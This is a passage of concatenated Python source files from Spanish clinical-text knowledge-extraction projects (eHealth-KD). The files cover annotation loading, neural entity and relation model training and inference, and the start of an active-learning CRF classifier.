```python
import bisect
import warnings
from pathlib import Path
from scripts.utils import Collection, Keyphrase, Relation, Sentence
warnings.warn(
"""The `script.legacy` module is deprecated!
Consider using `CollectionV1Handler` from `scripts.utils` instead."""
)
class eHealth2019:
@classmethod
def load_input(cls, collection: Collection, finput: Path):
sentences = [s.strip() for s in finput.open(encoding="utf8").readlines() if s]
sentences_obj = [Sentence(text) for text in sentences]
collection.sentences.extend(sentences_obj)
@classmethod
def load_keyphrases(cls, collection: Collection, finput: Path):
cls.load_input(collection, finput)
input_a_file = finput.parent / ("output_a_" + finput.name.split("_")[1])
sentences_length = [len(s.text) for s in collection.sentences]
for i in range(1, len(sentences_length)):
sentences_length[i] += sentences_length[i - 1] + 1
sentence_by_id = {}
for line in input_a_file.open(encoding="utf8").readlines():
lid, spans, label, _ = line.strip().split("\t")
lid = int(lid)
spans = [s.split() for s in spans.split(";")]
spans = [(int(start), int(end)) for start, end in spans]
# find the sentence where this annotation is
i = bisect.bisect(sentences_length, spans[0][0])
# correct the annotation spans
if i > 0:
spans = [
(
start - sentences_length[i - 1] - 1,
end - sentences_length[i - 1] - 1,
)
for start, end in spans
]
spans.sort(key=lambda t: t[0])
# store the annotation in the corresponding sentence
the_sentence = collection.sentences[i]
keyphrase = Keyphrase(the_sentence, label, lid, spans)
the_sentence.keyphrases.append(keyphrase)
if len(keyphrase.spans) == 1:
keyphrase.split()
sentence_by_id[lid] = the_sentence
return sentence_by_id
@classmethod
def load(cls, collection: Collection, finput: Path):
input_b_file = finput.parent / ("output_b_" + finput.name.split("_")[1])
sentence_by_id = cls.load_keyphrases(collection, finput)
for line in input_b_file.open(encoding="utf8").readlines():
label, src, dst = line.strip().split("\t")
src, dst = int(src), int(dst)
the_sentence = sentence_by_id[src]
if the_sentence != sentence_by_id[dst]:
warnings.warn(
"In file '%s' relation '%s' between %i and %i crosses sentence boundaries and has been ignored."
% (finput, label, src, dst)
)
continue
assert sentence_by_id[dst] == the_sentence
the_sentence.relations.append(
Relation(the_sentence, src, dst, label.lower())
)
return collection
```
#### File: ehealthkd-2020/src/ehealth20.py
```python
import os
import warnings
from typing import Dict
import torch
import torch.nn as nn
import torch.optim as optim
from kdtools.datasets import (
BILUOVSentencesDS,
DependencyTreeDS,
FocusOnEntityDS,
SelectedDS,
from_biluov,
match_tokens_to_entities,
to_biluov,
)
from kdtools.encoders import SequenceCharEncoder
from kdtools.layers import CharEmbeddingEncoder
from kdtools.models import (
AttentionSequenceTagger,
BasicSequenceClassifier,
BasicSequenceTagger,
BertBasedSequenceClassifier,
BertBasedSequenceTagger,
PairClassifier,
)
from kdtools.nlp import BertNLP, get_nlp
from kdtools.utils import (
jointly_train_on_shallow_dataloader,
train_on_shallow_dataloader,
)
from tqdm import tqdm
from scripts.submit import Algorithm, Run, handle_args
from scripts.utils import ENTITIES, RELATIONS, Collection, Keyphrase, Relation
TAXONOMIC_RELS = [
"is-a",
"same-as",
"part-of",
"has-property",
"causes",
"entails",
]
CONTEXT_RELS = [
"in-context",
"in-place",
"in-time",
"subject",
"target",
"domain",
"arg",
]
assert set(TAXONOMIC_RELS + CONTEXT_RELS) == set(RELATIONS)
class eHealth20Model(Algorithm):
CHAR_EMBEDDING_DIM = 100
CHAR_REPR_DIM = 200
TOKEN_REPR_DIM = 300
POSITIONAL_EMBEDDING_DIM = 100
def __init__(
self,
taskA_models=None,
taskB_pair_model=None,
taskB_seq_model=None,
*,
only_representative=False,
bert_mode=None,
only_bert=False,
cnet_mode=None,
ignore_path=False,
):
if only_bert and bert_mode is None:
raise ValueError("BERT mode not set!")
nlp = get_nlp()
self.nlp = nlp if bert_mode is None else BertNLP(nlp, merge=bert_mode)
self.bert_mode = bert_mode
self.taskA_models: Dict[nn.Module] = taskA_models
self.taskB_pair_model: nn.Module = taskB_pair_model
self.taskB_seq_model: nn.Module = taskB_seq_model
self.only_representative = only_representative
self.only_bert = only_bert
self.cnet_mode = cnet_mode
self.ignore_path = ignore_path
def run(self, collection: Collection, *args, taskA: bool, taskB: bool, **kargs):
print(f"Running {{ taskA:{taskA}, taskB:{taskB} }} at {kargs} ...")
if taskA:
if self.taskA_models is None:
warnings.warn("No model for taskA available. Skipping ...")
else:
print("Starting task A ...")
self.run_taskA(collection, *args, **kargs)
print("Done with task A!")
if taskB:
if self.taskB_pair_model is None and self.taskB_seq_model is None:
warnings.warn("No model for taskB available. Skipping ...")
else:
print("Starting task B ...")
self.run_taskB(collection, *args, **kargs)
print("Done with task B!")
return collection
def run_taskA(self, collection: Collection, *args, **kargs):
for label in ENTITIES:
self.run_taskA_for_label(collection, label, *args, **kargs)
collection.fix_ids()
def run_taskA_for_label(
self, collection: Collection, entity_label: str, *args, **kargs
):
model = self.taskA_models[entity_label]
print(f"Building dataset for {entity_label} ...")
dataset = BILUOVSentencesDS(
[s.text for s in collection.sentences], language=self.nlp
)
print(f"Done!")
with torch.no_grad():
for sid, (*s_features, _) in tqdm(
enumerate(dataset.shallow_dataloader()),
total=len(dataset),
desc=entity_label,
):
tokensxsentence = dataset.tokensxsentence[sid]
output = model(s_features)
output = model.decode(output)
labels = [dataset.labels[x] for x in output]
decoded = from_biluov(labels, tokensxsentence, spans=True)
sentence = collection.sentences[sid]
for spans in decoded:
keyphrase = Keyphrase(sentence, entity_label, -1, spans)
sentence.keyphrases.append(keyphrase)
def run_taskB(self, collection: Collection, *args, **kargs):
train_pairs, train_seq = (
(TAXONOMIC_RELS, CONTEXT_RELS)
if self.taskB_pair_model is not None and self.taskB_seq_model is not None
else (RELATIONS, None)
if self.taskB_pair_model is not None
else (None, RELATIONS)
if self.taskB_seq_model is not None
else (None, None)
)
mode, scenario = kargs["mode"], kargs["scenario"]
if mode == "train":
tag = "train"
elif mode == "dev":
tag = (
f"dev-{'transfer' if scenario.split('-')[-1] == 'transfer' else 'main'}"
)
elif mode == "test":
tag = f"test-{scenario.split('-')[-1]}"
else:
tag = None
print(f"Building dataset for {train_pairs} and {train_seq} ...")
pair_dataset, seq_dataset = self.build_taskB_dataset(
collection,
inclusion=1.1,
predict=True,
tag=tag,
train_pairs=train_pairs,
train_seqs=train_seq,
)
print("Done!")
self.run_taskB_on_pairs(pair_dataset, collection, *args, **kargs)
self.run_taskB_on_seqs(seq_dataset, collection, *args, **kargs)
def run_taskB_on_pairs(self, dataset, collection: Collection, *args, **kargs):
model = self.taskB_pair_model
if model is None:
return
with torch.no_grad():
for *features, (sid, s_id, d_id) in tqdm(
dataset.shallow_dataloader(),
total=len(dataset),
desc="Relations (Pairs)",
):
s_id = s_id.item()
d_id = d_id.item()
output = model(features).squeeze(0)
output = output.argmax(dim=-1)
label = dataset.labels[output.item()]
if label is None:
continue
sentence = collection.sentences[sid]
rel_origin = sentence.keyphrases[s_id].id
rel_destination = sentence.keyphrases[d_id].id
relation = Relation(sentence, rel_origin, rel_destination, label)
sentence.relations.append(relation)
def run_taskB_on_seqs(self, dataset, collection: Collection, *args, **kargs):
model = self.taskB_seq_model
if model is None:
return
with torch.no_grad():
for features, i, (sid, head_id, tokens_ids) in tqdm(
dataset.shallow_dataloader(),
total=len(dataset),
desc="Relations (Sequence)",
):
output = model((features, i))
output = model.decode(output)
labels = [dataset.labels[x] for x in output]
sentence = collection.sentences[sid]
head_entity = sentence.keyphrases[head_id]
for token_id, label in zip(tokens_ids, labels):
if label is None or token_id < 0:
continue
token_entity = sentence.keyphrases[token_id]
rel_origin = head_entity.id
rel_destination = token_entity.id
relation = Relation(sentence, rel_origin, rel_destination, label)
sentence.relations.append(relation)
def train(
self,
collection: Collection,
validation: Collection,
*,
jointly,
inclusion,
n_epochs=100,
save_to=None,
early_stopping=None,
use_crf=True,
weight=True,
train_pairs=TAXONOMIC_RELS,
train_seqs=CONTEXT_RELS,
straight_forward_encoding=False,
reduce=False,
dropout=False,
stacked_layers=1,
):
self.train_taskA(
collection,
validation,
jointly,
n_epochs,
save_to=save_to,
early_stopping=early_stopping,
use_crf=use_crf,
weight=weight,
dropout=dropout,
stacked_layers=stacked_layers,
)
self.train_taskB(
collection,
validation,
jointly,
inclusion,
n_epochs,
save_to=save_to,
early_stopping=early_stopping,
use_crf=use_crf,
weight=weight,
train_pairs=train_pairs,
train_seqs=train_seqs,
straight_forward_encoding=straight_forward_encoding,
reduce=reduce,
dropout=dropout,
)
def train_taskA(
self,
collection: Collection,
validation: Collection,
jointly,
n_epochs=100,
save_to=None,
early_stopping=None,
use_crf=True,
weight=True,
dropout=False,
stacked_layers=1,
):
if self.only_bert and jointly:
warnings.warn(
"Cannot train jointly while using only BERT model! `jointly` will be ignored"
)
jointly = False
char_encoder = None
models = {}
datasets = {}
validations = {}
for label in ENTITIES:
dataset = self.build_taskA_dataset(collection, label)
model = self.build_taskA_model(
dataset,
n_epochs,
shared=char_encoder,
use_crf=use_crf,
dropout=dropout,
stacked_layers=stacked_layers,
)
validation_ds = self.build_taskA_dataset(validation, label)
models[label] = model
datasets[label] = dataset
validations[label] = validation_ds
char_encoder = model.char_encoder if jointly else None
if jointly:
# dicts are stable
self.train_all_taskA_models(
models.values(),
datasets.values(),
validations.values(),
"all",
n_epochs,
save_to=(
[save_to(label) for label in ENTITIES]
if save_to is not None
else None
),
early_stopping=early_stopping,
use_crf=use_crf,
weight=weight,
)
else:
for label in ENTITIES:
self.train_taskA_model(
models[label],
datasets[label],
validations[label],
label,
n_epochs,
save_to=save_to(label) if save_to is not None else None,
early_stopping=early_stopping,
use_crf=use_crf,
weight=weight,
)
self.taskA_models = models
def build_taskA_model(
self,
dataset: BILUOVSentencesDS,
n_epochs=100,
*,
shared=None,
use_crf=True,
dropout=False,
stacked_layers=1,
):
if self.only_bert:
model = BertBasedSequenceTagger(
word_repr_dim=dataset.vectors_len,
num_labels=dataset.label_size,
use_crf=use_crf,
)
else:
model = BasicSequenceTagger(
char_vocab_size=dataset.char_size,
char_embedding_dim=self.CHAR_EMBEDDING_DIM,
padding_idx=dataset.padding,
char_repr_dim=self.CHAR_REPR_DIM,
word_repr_dim=dataset.vectors_len,
postag_repr_dim=dataset.pos_size,
token_repr_dim=self.TOKEN_REPR_DIM,
num_labels=dataset.label_size,
char_encoder=shared,
use_crf=use_crf,
dropout=dropout,
stacked_layers=stacked_layers,
)
return model
def build_taskA_dataset(self, collection: Collection, entity_label: str):
sentences = [s.text for s in collection.sentences]
entities = [
[k.spans for k in s.keyphrases if k.label == entity_label]
for s in collection.sentences
]
dataset = BILUOVSentencesDS(sentences, entities, language=self.nlp)
return dataset
def train_taskA_model(
self,
model,
dataset,
validation,
desc,
n_epochs=100,
save_to: str = None,
early_stopping=None,
use_crf=True,
weight=True,
):
if use_crf and weight:
warnings.warn(
"Using both CRF and weighting in taskA model. `weight` will be ignored."
)
criterion = (
model.crf_loss
if use_crf
else nn.CrossEntropyLoss(weight=dataset.weights())
if weight
else None
)
validation_criterion = (
model.crf_loss
if use_crf
else nn.CrossEntropyLoss(weight=validation.weights())
if weight
else None
)
train_on_shallow_dataloader(
model,
dataset,
validation,
optim=optim.SGD,
criterion=criterion,
validation_criterion=validation_criterion,
predictor=model.decode if use_crf else None,
n_epochs=n_epochs,
desc=desc,
save_to=save_to,
early_stopping=early_stopping,
extra_config=dict(bert=self.bert_mode),
)
def train_all_taskA_models(
self,
models,
datasets,
validations,
desc,
n_epochs=100,
save_to: str = None,
early_stopping=None,
use_crf=True,
weight=True,
):
if use_crf and weight:
warnings.warn(
"Using both CRF and weighting in taskA model. `weight` will be ignored."
)
if use_crf:
criterion = lambda i, model: model.crf_loss
validation_criterion = None
elif weight:
_criterion = [
nn.CrossEntropyLoss(weight=dataset.weights()) for dataset in datasets
]
criterion = lambda i, model: _criterion[i]
_validation_criterion = [
nn.CrossEntropyLoss(weight=validation.weights())
for validation in validations
]
validation_criterion = lambda i, model: _validation_criterion[i]
else:
criterion, validation_criterion = None, None
jointly_train_on_shallow_dataloader(
models,
datasets,
validations,
optim=optim.SGD,
criterion=criterion,
validation_criterion=validation_criterion,
predictor=(lambda i, model: model.decode) if use_crf else None,
n_epochs=n_epochs,
desc=desc,
save_to=save_to,
early_stopping=early_stopping,
extra_config=dict(bert=self.bert_mode),
)
def train_taskB(
self,
collection: Collection,
validation: Collection,
jointly,
inclusion,
n_epochs=100,
save_to=None,
early_stopping=None,
weight=True,
use_crf=True,
train_pairs=TAXONOMIC_RELS,
train_seqs=CONTEXT_RELS,
straight_forward_encoding=False,
reduce=False,
dropout=False,
):
if weight and inclusion <= 1:
warnings.warn(
"Since using `weight=True`, you probably meant to set `inclusion=1.1`."
)
if self.only_bert and jointly:
warnings.warn(
"Cannot train jointly while using only BERT model! `jointly` will be ignored"
)
jointly = False
print(f"Training pairs: {train_pairs}")
print(f"Training seqs: {train_seqs}")
dataset1, dataset2 = self.build_taskB_dataset(
collection,
inclusion,
tag="train",
train_pairs=train_pairs,
train_seqs=train_seqs,
)
validation_ds1, validation_ds2 = self.build_taskB_dataset(
validation,
inclusion=1.1,
tag="dev-main",
train_pairs=train_pairs,
train_seqs=train_seqs,
)
char2repr = (
next(iter(self.taskA_models.values())).char_encoder if jointly else None
)
if dataset1 is not None:
if self.only_bert:
model = BertBasedSequenceClassifier(
word_repr_dim=dataset1.vectors_len,
num_labels=dataset1.label_size,
merge_mode=self.bert_mode,
pairwise_info_size=dataset1.pair_size,
reduce=reduce,
)
elif self.ignore_path:
model = PairClassifier(
char_vocab_size=dataset1.char_size,
char_embedding_dim=self.CHAR_EMBEDDING_DIM,
padding_idx=dataset1.padding,
char_repr_dim=self.CHAR_REPR_DIM,
word_repr_dim=dataset1.vectors_len,
postag_repr_dim=dataset1.pos_size,
entity_repr_dim=dataset1.ent_size,
subtree_repr_dim=self.TOKEN_REPR_DIM,
num_labels=dataset1.label_size,
char_encoder=char2repr,
already_encoded=False,
freeze=True,
pairwise_info_size=dataset1.pair_size,
reduce=reduce,
)
else:
model = BasicSequenceClassifier(
char_vocab_size=dataset1.char_size,
char_embedding_dim=self.CHAR_EMBEDDING_DIM,
padding_idx=dataset1.padding,
char_repr_dim=self.CHAR_REPR_DIM,
word_repr_dim=dataset1.vectors_len,
postag_repr_dim=dataset1.pos_size,
dep_repr_dim=dataset1.dep_size,
entity_repr_dim=dataset1.ent_size,
subtree_repr_dim=self.TOKEN_REPR_DIM,
token_repr_dim=self.TOKEN_REPR_DIM,
num_labels=dataset1.label_size,
char_encoder=char2repr,
already_encoded=False,
freeze=True,
pairwise_info_size=dataset1.pair_size,
reduce=reduce,
)
criterion = (
nn.CrossEntropyLoss(weight=dataset1.weights()) if weight else None
)
validation_criterion = (
nn.CrossEntropyLoss(weight=validation_ds1.weights()) if weight else None
)
train_on_shallow_dataloader(
model,
dataset1,
validation_ds1,
criterion=criterion,
validation_criterion=validation_criterion,
n_epochs=n_epochs,
desc="relations (pairs)",
save_to=save_to("taskB-pairs"),
early_stopping=early_stopping,
extra_config=dict(bert=self.bert_mode, cnet=self.cnet_mode),
)
self.taskB_pair_model = model
if dataset2 is not None:
## THIS IS NOT CONVENIENT
# char2repr = (
# self.taskB_pair_model.char_encoder
# if jointly and char2repr is None and self.taskB_pair_model is not None
# else char2repr
# )
model = AttentionSequenceTagger(
char_vocab_size=dataset2.char_size,
char_embedding_dim=self.CHAR_EMBEDDING_DIM,
padding_idx=dataset2.padding,
char_repr_dim=self.CHAR_REPR_DIM,
word_repr_dim=dataset2.vectors_len,
postag_repr_dim=dataset2.pos_size,
dep_repr_dim=dataset2.dep_size,
rdep_repr_dim=dataset2.rdep_size,
entity_repr_dim=dataset2.ent_size,
token_repr_dim=self.TOKEN_REPR_DIM,
position_repr_dim=dataset2.positional_size,
num_labels=dataset2.label_size,
char_encoder=char2repr,
already_encoded=False,
freeze=True,
use_crf=use_crf,
pairwise_repr_dim=dataset2.pair_size,
straight_forward_encoding=straight_forward_encoding,
)
if use_crf and weight:
warnings.warn(
"Using both CRF and weighting in sequence relation model. `weight` will be ignored."
)
criterion = (
model.crf_loss
if use_crf
else nn.CrossEntropyLoss(weight=dataset2.weights())
if weight
else None
)
validation_criterion = (
model.crf_loss
if use_crf
else nn.CrossEntropyLoss(weight=validation_ds2.weights())
if weight
else None
)
predictor = model.decode if use_crf else None
train_on_shallow_dataloader(
model,
dataset2,
validation_ds2,
criterion=criterion,
validation_criterion=validation_criterion,
predictor=predictor,
n_epochs=n_epochs,
desc="relations (sequence)",
save_to=save_to("taskB-seqs"),
early_stopping=early_stopping,
extra_config=dict(bert=self.bert_mode, cnet=self.cnet_mode),
)
self.taskB_seq_model = model
def build_taskB_dataset(
self,
collection: Collection,
inclusion,
predict=False,
tag=None,
train_pairs=TAXONOMIC_RELS,
train_seqs=CONTEXT_RELS,
):
if train_pairs is None and train_seqs is None:
return None, None
tokensxsentence = [self.nlp(s.text) for s in collection.sentences]
entities = [
[(k.spans, k.label) for k in s.keyphrases] for s in collection.sentences
]
entitiesxsentence, token2label = match_tokens_to_entities(
tokensxsentence, entities, only_representative=self.only_representative
)
keyphrase2tokens = {
keyphrase: token
for sentence, tokens in zip(collection.sentences, entitiesxsentence)
for keyphrase, token in zip(sentence.keyphrases, tokens)
}
def get_relations(labels):
return (
{
(
keyphrase2tokens[rel.from_phrase],
keyphrase2tokens[rel.to_phrase],
): rel.label
for sentence in collection.sentences
for rel in sentence.relations
if rel.label in labels
}
if not predict
else None
)
pair_dataset = (
DependencyTreeDS(
entitiesxsentence,
get_relations(set(train_pairs)),
token2label,
ENTITIES,
train_pairs,
self.nlp,
inclusion=inclusion,
char2repr=None,
conceptnet=(
self.cnet_mode
if tag is None
else {"mode": self.cnet_mode, "tag": tag}
),
ignore_deps=self.ignore_path or self.only_bert,
)
if train_pairs is not None
else None
)
seq_dataset = (
FocusOnEntityDS(
tokensxsentence,
entitiesxsentence,
get_relations(set(train_seqs)),
token2label,
ENTITIES,
train_seqs,
self.nlp,
self.POSITIONAL_EMBEDDING_DIM,
char2repr=None,
conceptnet=(
self.cnet_mode
if tag is None
else {"mode": self.cnet_mode, "tag": tag}
),
)
if train_seqs is not None
else None
)
return pair_dataset, seq_dataset
def save_models(self, path="./trained/"):
for label, model in self.taskA_models.items():
torch.save(model, os.path.join(path, f"taskA-{label}.pt"))
torch.save(self.taskB_pair_model, os.path.join(path, "taskB.pt"))
torch.save(self.taskB_seq_model, os.path.join(path, "taskB-seqs.pt"))
if __name__ == "__main__":
from pathlib import Path
def name_to_path(name):
if name in ENTITIES:
return f"trained/taskA-{name}.pt"
if name == "taskB-pairs":
return "trained/taskB.pt"
if name == "taskB-seqs":
return "trained/taskB-seqs.pt"
raise ValueError("Cannot handle `name`")
def _training_task(
n_epochs,
*,
bert_mode,
cnet_mode,
ignore_path,
inclusion=1.1,
task=None,
jointly=True,
early_stopping=None,
use_crf=True,
weight=True,
only_bert=False,
reduce=False,
split_relations="both",
straight_forward_encoding=False,
dropout=False,
stacked_layers=1,
):
if split_relations not in ("both", "pair", "seq"):
raise ValueError()
training = Collection().load(Path("data/training/scenario.txt"))
validation = Collection().load(Path("data/development/main/scenario.txt"))
early_stopping = early_stopping or dict(wait=5, delta=0.0)
train_pairs = (
TAXONOMIC_RELS
if split_relations == "both"
else RELATIONS
if split_relations == "pair"
else None
)
train_seqs = (
CONTEXT_RELS
if split_relations == "both"
else RELATIONS
if split_relations == "seq"
else None
)
algorithm = eHealth20Model(
bert_mode=bert_mode,
only_bert=only_bert,
cnet_mode=cnet_mode,
ignore_path=ignore_path,
)
if task is None:
algorithm.train(
training,
validation,
jointly=jointly,
inclusion=inclusion,
n_epochs=n_epochs,
save_to=name_to_path,
early_stopping=early_stopping,
use_crf=use_crf,
weight=weight,
train_pairs=train_pairs,
train_seqs=train_seqs,
straight_forward_encoding=straight_forward_encoding,
reduce=reduce,
dropout=dropout,
stacked_layers=stacked_layers,
)
elif task == "A":
algorithm.train_taskA(
training,
validation,
jointly=jointly,
n_epochs=n_epochs,
save_to=name_to_path,
early_stopping=early_stopping,
use_crf=use_crf,
weight=weight,
dropout=dropout,
stacked_layers=stacked_layers,
)
elif task == "B":
# load A
if jointly:
taskA_models = {}
for label in ENTITIES:
checkpoint = torch.load(f"trained/taskA-{label}.pt")
_ensure_bert(bert_mode, checkpoint)
model = checkpoint["model"]
taskA_models[label] = model
model.eval()
algorithm.taskA_models = taskA_models
algorithm.train_taskB(
training,
validation,
jointly=jointly,
inclusion=inclusion,
n_epochs=n_epochs,
save_to=name_to_path,
early_stopping=early_stopping,
weight=weight,
use_crf=use_crf,
train_pairs=train_pairs,
train_seqs=train_seqs,
straight_forward_encoding=straight_forward_encoding,
reduce=reduce,
dropout=dropout,
)
def _log_checkpoint(checkpoint, *, desc):
print(f"[{desc}]:".center(80, ":"))
for key, value in checkpoint.items():
print(f"{key}: {value}")
def _ensure_bert(bert_mode, checkpoint):
try:
bert = checkpoint["bert"]
if bert_mode != bert:
raise ValueError(
"The model was not trained using the same configuration of BERT."
)
except KeyError:
if bert_mode is not None:
raise ValueError("The model was not trained using BERT.")
def _ensure_conceptnet(cnet_mode, checkpoint):
try:
conceptnet = checkpoint["cnet"]
if cnet_mode != conceptnet:
raise ValueError(
"The model was not trained using the same configuration for ConceptNet."
)
except KeyError:
if cnet_mode is not None:
raise ValueError("The model was not trained using ConceptNet.")
def _run_task(
run_name="ehealth20-default",
*,
bert_mode,
cnet_mode,
ignore_path,
task=None,
only_bert=False,
):
if task == "B":
taskA_models = None
else:
taskA_models = {}
for label in ENTITIES:
checkpoint = torch.load(f"trained/taskA-{label}.pt")
_log_checkpoint(checkpoint, desc=label)
_ensure_bert(bert_mode, checkpoint)
model = checkpoint["model"]
taskA_models[label] = model
model.eval()
if task == "A":
taskB_pair_model = None
taskB_seq_model = None
else:
try:
checkpoint = torch.load("./trained/taskB.pt")
_log_checkpoint(checkpoint, desc="Relations (Pairs)")
_ensure_bert(bert_mode, checkpoint)
_ensure_conceptnet(cnet_mode, checkpoint)
taskB_pair_model = checkpoint["model"]
if taskB_pair_model is not None:
taskB_pair_model.eval()
except FileNotFoundError:
taskB_pair_model = None
try:
checkpoint = torch.load("./trained/taskB-seqs.pt")
_log_checkpoint(checkpoint, desc="Relations (Sequence)")
_ensure_bert(bert_mode, checkpoint)
_ensure_conceptnet(cnet_mode, checkpoint)
taskB_seq_model = checkpoint["model"]
if taskB_seq_model is not None:
taskB_seq_model.eval()
except FileNotFoundError:
taskB_seq_model = None
algorithm = eHealth20Model(
taskA_models,
taskB_pair_model,
taskB_seq_model,
bert_mode=bert_mode,
only_bert=only_bert,
cnet_mode=cnet_mode,
ignore_path=ignore_path,
)
tasks = handle_args()
Run.submit(run_name, tasks, algorithm)
def _test_biluov_task():
import es_core_news_md
from scripts.utils import Sentence
def forward(tokensxsentence, entitiesxsentence):
labelsxsentence, _ = to_biluov(tokensxsentence, entitiesxsentence)
return [
from_biluov(biluov, sentence, spans=True)
for biluov, sentence in zip(labelsxsentence, tokensxsentence)
]
training = Collection().load(Path("data/training/scenario.txt"))
nlp = es_core_news_md.load()
def per_label(label):
tokensxsentence = [nlp(s.text) for s in training.sentences]
entitiesxsentence = [
[k.spans for k in s.keyphrases if k.label == label]
for s in training.sentences
]
decoded = forward(tokensxsentence, entitiesxsentence)
return decoded
collection = Collection([Sentence(s.text) for s in training.sentences])
for label in ENTITIES:
decoded = per_label(label)
for entities, sentence in zip(decoded, collection.sentences):
for spans in entities:
keyphrase = Keyphrase(sentence, label, -1, spans)
sentence.keyphrases.append(keyphrase)
collection.fix_ids()
output = Path("data/submissions/forward-biluov/train/run1/scenario2-taskA/")
output.mkdir(parents=True, exist_ok=True)
collection.dump(output / "scenario.txt", skip_empty_sentences=False)
``` |
{
"source": "jpconsuegra/ensemble-baseline",
"score": 2
} |
#### File: ensemble-baseline/autobrat/classifier.py
```python
from pathlib import Path
from sklearn.model_selection import train_test_split
from sklearn.svm import SVC
from threading import Thread, Lock
import random
import scipy
import logging
import fire
import uuid
import shutil
import os
import tqdm
import spacy
import numpy as np
import pickle
from sklearn_crfsuite import CRF
from gensim.models.doc2vec import Doc2Vec, TaggedDocument
from sklearn.feature_extraction import DictVectorizer
from sklearn.linear_model import LogisticRegression
from sklearn.pipeline import make_pipeline
from scripts.utils import Collection, Keyphrase, Relation, Sentence
from autobrat.data import (
load_training_entities,
load_corpus,
save_corpus,
make_sentence,
load_training_relations,
_extract_keyphrases_features,
spacy_model,
)
logger = logging.getLogger("autobrat.classifier")
class Model:
def __init__(
self,
corpus: Collection,
callback=None,
language: str = "es",
negative_sampling: float = 0.25,
suggest_mode: str = "full",
max_entity_uncertainty: float = 1e50,
max_relation_uncertainty: float = 1e50,
):
self.corpus = corpus
self.lock = Lock()
self.callback = callback
self.language = language
self.entity_classifier = ClassifierEntity(
callback, negative_sampling=negative_sampling
)
self.suggest_mode = suggest_mode
self.max_entity_uncertainty = max_entity_uncertainty
self.max_relation_uncertainty = max_relation_uncertainty
def train(self):
self.train_similarity()
self.train_entities()
self.train_relations()
if self.lock.locked():
self.lock.release()
logger.info("Training finished")
def train_similarity(self):
nlp = spacy_model(self.language)
docs = []
for i, sentence in enumerate(self.corpus):
doc = nlp(sentence.text)
docs.append(TaggedDocument([token.text for token in doc], [i]))
self.doc2vec = Doc2Vec(docs, min_count=1, epochs=100, vector_size=25)
self.entity_classifier.doc2vec = self.doc2vec
def train_entities(self):
# vectorizer
logger.info("Loading entities training set")
lines, classes = load_training_entities(self.corpus)
self.entity_classifier.train_entities(lines, classes)
def train_relations(self):
"""Entrena el clasificador de relaciones con un par de palabras y
la relación correspondiente entre ellas, incluyendo la relación NONE.
"""
logger.info("Loading relations training set")
self.entity_classifier.train_relations(self.corpus)
def train_async(self):
if self.lock.locked():
logger.warning("Training in process, skipping this batch.")
return False
thread = Thread(target=self.train)
thread.start()
return True
def relevant_sentence(self, sentence, relevant_words):
relevant = 0
for i in sentence:
relevant += relevant_words[i.text]
return relevant / len(sentence)
def predict_entities(self, sentences):
"""Predice para cada palabra su etiqueta
"""
collection = self.entity_classifier.predict_entities(sentences)
for sentence in collection:
sentence.keyphrases = [
k
for k in sentence.keyphrases
if k.uncertainty < self.max_entity_uncertainty
]
return collection
def predict_relations(self, collection):
"""Predice para cada oración todas las relaciones
"""
collection = self.entity_classifier.predict_relations(collection)
for sentence in collection:
sentence.relations = [
r
for r in sentence.relations
if r.uncertainty < self.max_relation_uncertainty
]
return collection
def predict(self, sentences):
return self.predict_relations(self.predict_entities(sentences))
def score_sentence(self, sentence, return_dict=False):
if self.suggest_mode == "entity":
return self.entity_classifier.score_entities(sentence)
if self.suggest_mode == "relation":
return self.entity_classifier.score_relations(sentence)
score_entity = self.entity_classifier.score_entities(sentence)
score_relation = self.entity_classifier.score_relations(sentence)
score_similarity = self.entity_classifier.score_similarity(sentence)
if return_dict:
return dict(
score_entity=score_entity,
score_relations=score_relation,
score_similarity=score_similarity,
)
return 0.5 * (score_entity + score_relation) * score_similarity
def suggest(self, pool, count=5):
"""Devuelve las k oraciones más relevantes
"""
scores = {s: self.score_sentence(s) for s in pool}
scores = sorted(scores, key=scores.get)
return scores[-count:]
class ClassifierEntity:
"""
Representa un clasificador de entidades, independiente del corpus.
Puede ser entrenado con una lista de entidades en formato BILOUV
y usado para predecir en una lista de oraciones vacías.
"""
def __init__(self, callback=None, negative_sampling=0.25):
self.callback = callback
self.doc2vec = None
self.negative_sampling = negative_sampling
self.n_similarity_estimates = 10
def predict_entities(self, sentences):
if isinstance(sentences[0], Sentence):
sentences = [s.text for s in sentences]
result = []
nlp = spacy_model("es")
for i, sentence in enumerate(sentences):
if self.callback:
self.callback(
msg="Processing sentence", current=i, total=len(sentences)
)
doc, xs = self.feature_sentence(sentence)
sentence = self.predict_single(doc, xs)
result.append(sentence)
return Collection(sentences=result)
def predict_single(self, doc, sequence_of_features):
labels = self.classifier.predict_single(sequence_of_features)
sentence = make_sentence(doc, labels, self.classes)
sentence.fix_ids()
ys = self.classifier.predict_marginals_single(sequence_of_features)
entropies = [scipy.stats.entropy(list(yi.values()), base=2) for yi in ys]
for keyphrase in sentence.keyphrases:
start = keyphrase.spans[0][0]
end = keyphrase.spans[-1][1]
keyphrase_tokens = [
i
for i, token in enumerate(doc)
if token.idx >= start and token.idx + len(token) <= end
]
keyphrase_entropies = [entropies[i] for i in keyphrase_tokens]
keyphrase.uncertainty = sum(keyphrase_entropies) / len(keyphrase_entropies)
return sentence
def score_entities(self, sentence):
doc, xs = self.feature_sentence(sentence)
keyphrases = self.predict_single(doc, xs).keyphrases
entropies = [k.uncertainty for k in keyphrases]
mean_entropy = sum(entropies) / len(entropies) if entropies else 0
return mean_entropy
def score_relations(self, sentence):
doc, xs = self.feature_sentence(sentence)
sentence = self.predict_single(doc, xs)
self.predict_relation_single(doc, sentence)
entropies = [r.uncertainty for r in sentence.relations]
mean_entropy = sum(entropies) / len(entropies) if entropies else 0
return mean_entropy
def score_similarity(self, sentence):
tokens = [token.text for token in spacy_model("es")(sentence)]
inferred_vector = self.doc2vec.infer_vector(tokens)
sims = [
v
for i, v in self.doc2vec.docvecs.most_similar(
[inferred_vector], topn=self.n_similarity_estimates
)
]
return np.mean(sims)
def feature_sentence(self, sentence):
nlp = spacy_model("es")
if isinstance(sentence, str):
doc = nlp(sentence)
else:
doc = sentence
xs = []
for token in doc:
xs.append(self.word_features(token))
return doc, xs
def word_features(self, word):
features = dict(
text=word.text,
pos=word.pos_,
dep=word.dep_,
lemma=word.lemma_,
entity=word.ent_type_,
entity_iob=word.ent_iob_,
kb_id=word.ent_kb_id,
shape=word.shape_,
is_alpha=word.is_alpha,
is_ascii=word.is_ascii,
is_digit=word.is_digit,
is_lower=word.is_lower,
is_upper=word.is_upper,
is_title=word.is_title,
is_punct=word.is_punct,
